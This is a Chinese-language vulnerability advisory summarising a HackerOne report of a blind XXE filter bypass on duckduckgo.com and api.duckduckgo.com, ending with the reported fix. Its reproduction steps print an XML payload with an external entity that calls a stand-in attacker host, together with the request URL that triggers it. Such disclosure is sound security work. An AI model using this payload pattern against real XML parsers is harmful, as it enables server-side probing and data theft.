DuckDuckGo上Blind XXE漏洞防护绕过

近期，白帽汇安全研究院发现HackerOne网站公开了一个DuckDuckGo网站的XXE漏洞。该漏洞是以前一个DuckDuckGo网站XXE漏洞的新绕过方法，两个漏洞的发现者为同一个人。（上个XXE漏洞说明：https://nosec.org/home/detail/2219.html）

DuckDuckGo强调在传统搜寻引擎的基础上引入各大Web 2.0站点的内容。其办站哲学主张维护使用者的隐私权，并承诺不监控、不记录使用者的搜寻内容。

——来自百度百科

以下为漏洞具体说明：

复现步骤

1. 首先攻击者在自己的外网服务器上搭建web服务，并且放上一个文件内容如下的XXE攻击文件（xm l文件）：

<?xm l version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext;
]>
<r></r>

2. 攻击者在浏览器上访问 https://duckduckgo.com/x.js?u=http://attacker_host/xxe.xm l，其中http://attacker_host/xxe.xm l代表上一步的XXE攻击文件：

3. 最后，攻击者可在自己的服务器上检测到http://attacker_host/Blind_xxe被访问，这说明攻击者的xm l文件成功被DuckDuckGo解析。

最后，发现者还表示，不仅duckduckgo.com存在这个问题，api.duckduckgo.com网站也存在这个问题。

随后，DuckDuckGo安全团队表示漏洞已再次修复，请帮忙检查。发现者在复查后，表示虽不知道后端防护逻辑，但漏洞已成功修复。不过，发现者同时表示，XXE漏洞的防护不能只检查文件引用源头，还要检查文件的内容。

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场
来源：https://hackerone.com/reports/486732